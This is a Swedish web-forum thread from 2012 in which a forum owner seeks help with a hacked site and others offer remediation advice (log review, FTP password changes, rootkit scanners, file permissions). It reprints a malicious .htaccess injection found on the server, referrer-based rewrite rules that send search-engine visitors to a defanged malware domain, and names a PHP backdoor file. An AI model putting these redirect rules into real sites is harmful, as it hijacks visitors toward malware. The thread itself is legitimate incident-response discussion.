WN

WN (https://www.wn.se/forum/index.php)
-   Allmänt (https://www.wn.se/forum/forumdisplay.php?f=2)
-   -   Elak kod någon stans som gömmer sig (https://www.wn.se/forum/showthread.php?t=1051873)

BarateaU 2012-01-18 23:51
Elak kod någon stans som gömmer sig
 
Kom hem från sol och bad och möttes av massa fina meddelanden om "hijack" på mitt forum.
Försöker hitta tänkar elak kod men ser ingen röd tråd.

Trycker jag på "nya inlägg"
http://www.mobilabredband.se/forum/s...on=show_recent

Så skickas man ibland hit:
hxxp:/ /onmouseout-divstyle.ru/vis/index.php?action=show_recent

Vilket är någon trevlig virussida.

Sneglar jag på koden så ser det ut som detta.
<a href="http://www.mobilabredband.se/forum/viewtopic.php?id=4016&amp;action=new" title="Gå till det första nya inlägget sen ditt senaste besök.">Nya inlägg</a>

Vad kan då detta betyda, att de har ändrat något i databas strukturen eller html koden?

BarateaU 2012-01-19 00:17
Hittade detta fina i min .htaccess fil bland annat


Kod:
<IfModule mod_rewrite.c>                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                RewriteEngine On                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                RewriteRule ^(.*)$ hxxp: / / onmouseout-divstyle.ru/vis/index.php [R=301,L]                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                RewriteRule ^(.*)$ hxxp: / /onmouseout-divstyle.ru/vis/index.php [R=301,L]                                                                                                                                                                                                                                               

                                                                                                                                                                                                                                                </IfModule>

foks 2012-01-19 07:51
Glöm inte att kolla hur .htaccessfilen ändrats. Notera tiden för när filen ändrades och jämför med accessloggarna. Hittar du ingenting där kan intrånget ha skett via FTP.

foks 2012-01-19 08:19
Update: Jag anar att du själv administrerar den här servern och det inte är ett webbhotellskont. Notera att även andra domäner på servern är drabbade, se http://sakrare.ikyon.se/?ip=188.95.227.20. Det är jag som driver den här sidan, attacken mot det här ip-numret upptäcktes i tisdags men på grund av lite krångel hos mig har de här rapporterna inte kommit iväg förrän nu.

b_andersson 2012-01-19 10:09
Installera och kör dessa för att kolla så du inte har ngt rootkit eller liknande som ligger kvar:

http://www.rootkit.nl/projects/rootkit_hunter.html
http://www.rfxn.com/projects/linux-malware-detect/

BarateaU 2012-01-19 11:32
Servern är citynetworks shared hosting

BarateaU 2012-01-19 11:43
Citat:
Ursprungligen postat av foks (Inlägg 20430308)
Glöm inte att kolla hur .htaccessfilen ändrats. Notera tiden för när filen ändrades och jämför med accessloggarna. Hittar du ingenting där kan intrånget ha skett via FTP.
Tyvärr har de bara access loggar från http och ej ftp.

Citat:
Ursprungligen postat av foks (Inlägg 20430310)
Update: Jag anar att du själv administrerar den här servern och det inte är ett webbhotellskont. Notera att även andra domäner på servern är drabbade, se http://sakrare.ikyon.se/?ip=188.95.227.20. Det är jag som driver den här sidan, attacken mot det här ip-numret upptäcktes i tisdags men på grund av lite krångel hos mig har de här rapporterna inte kommit iväg förrän nu.
Många av de sidorna är mina förutom 1, så kanske inte är kopplat till mig direkt utan nått med servern.

Citat:
Ursprungligen postat av b_andersson (Inlägg 20430318)
Installera och kör dessa för att kolla så du inte har ngt rootkit eller liknande som ligger kvar:

http://www.rootkit.nl/projects/rootkit_hunter.html
http://www.rfxn.com/projects/linux-malware-detect/
Måste ringa CN och höra vad som händer, efter jag fixade .htacessen igår så är den tillbaka till hijack idag.
Har bytt ftp konton nu också, får se om de hjälper lite.

gregoff 2012-01-19 12:14
Håll gärna tråden uppdaterad om vad som var orsaken när du/ni vet. Skulle vara intressant att veta vad man kanske inte tänker på själv.

Var med om något liknande tidigare på en tidigare arbetsplats. Där var problemet att ftp-lösen hade läckt ut från kunden själv.

AndreasS 2012-01-19 12:21
Det där har jag sett på flera kunders konton tidigare hos oss. Det som verkar ske är att FTP-lösenordet kommer ut (vanligen genom virus på datorn eller i samma nätverk som FTP-anslutningarna görs från). Sen brukar något kolla igenom kontot efter .htaccess-filer, ta ner dessa, lägga till redirects som kollar efter browser, vilken väg de kom in (referrer osv) och sen skicka vidare till antingen reklam eller virussidor.

Enda åtgärden vi har behövt göra i dessa fall är att meddela kunden, byta lösenord på FTP och be kunden köra en komplett virusscanning, det har löst alla ärenden jag kan minnas hittills.

BarateaU 2012-01-19 13:39
Har pratat med CN och de lät inte som jag var ensam om att ha anmält detta.
Men får se om det är knytet till mitt ftp konto enskilt eller vad det beror på.
Skall försöka rensa upp bäst jag kan nu

BarateaU 2012-01-19 15:36
Fick hjälp nu från supporten att ändra att enbart root har rättighet att ändra .htaccess
Får se om detta hjälper mig.

Dock har ju sidan hamnat i alla fina filter nu vilket dödar hela besöksfloden.

BarateaU 2012-01-19 23:48
Efter dagens tidigare rensning så var alla .htaccess tillbaka när jag titta nyss.
Har rensat och lagt upp nya ch moddat till 444, se om de hjälper nå

gregoff 2012-01-20 07:53
Citat:
Ursprungligen postat av BarateaU (Inlägg 20430391)
Efter dagens tidigare rensning så var alla .htaccess tillbaka när jag titta nyss.
Har rensat och lagt upp nya ch moddat till 444, se om de hjälper nå
Bytt lösen på ftp'n än?

FredrikNas 2012-01-20 08:31
Citat:
Ursprungligen postat av gregoff (Inlägg 20430404)
Bytt lösen på ftp'n än?


Hmm jag blev också drabbad av detta, ett flertal sidor (samma FTP), men problemet upphörde inte efter att jag bytte ut FTP lösenordet. Det var inte förrän jag ersatt all kod i alla WP installationer som jag slutade få sura hijack rapporter.
Naturligtvis var alla raporterade instanser borttagna redan, men det verkade nästan som att det spred sig ytterligare efter att FTP lösenordet blev bytt.

BarateaU 2012-01-20 11:20
Citat:
Ursprungligen postat av gregoff (Inlägg 20430404)
Bytt lösen på ftp'n än?

yes


Citat:
Ursprungligen postat av FredrikNas (Inlägg 20430406)
Hmm jag blev också drabbad av detta, ett flertal sidor (samma FTP), men problemet upphörde inte efter att jag bytte ut FTP lösenordet. Det var inte förrän jag ersatt all kod i alla WP installationer som jag slutade få sura hijack rapporter.
Naturligtvis var alla raporterade instanser borttagna redan, men det verkade nästan som att det spred sig ytterligare efter att FTP lösenordet blev bytt.
bytt lösen och rensat allt elakt jag hitta igår natt.
imorse var allt tillbaka igen vilket gör en lite less.

nu håller gubbsen på CN på att försöka hitta någon röd tråd, de har låst mitt ftp konto och jag hoppas att de hittar nått snart.

rädd för att de skulle vara någon form av rootkit på min maskin, fast jag kör med flera olika maskiner också. Kört vanliga av scanningar utan några resultat och tog de säkra före de osäkra och blåste om maskinen nu också.
Alla som besöker mina sidor blir infekterade också vilket är skapligt dåligt för mig.

BarateaU 2012-01-20 18:53
Efter letande bland filerna så har jag hittat 2 elaka filer en så länge.
Kan vara de som lyckas göra vad de vill med mina .htaccess filer då.

Under: /wp-content/uploads/_cache.php->(SCRIPT0000)

Fick ut denna rapporten.
Backdoor:PHP/Shell.F
Encyclopedia entry
Published: Jan 18, 2012



http://www.microsoft.com/security/po...tid=2147652984


Alla tider är GMT +2. Klockan är nu 08:57.

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson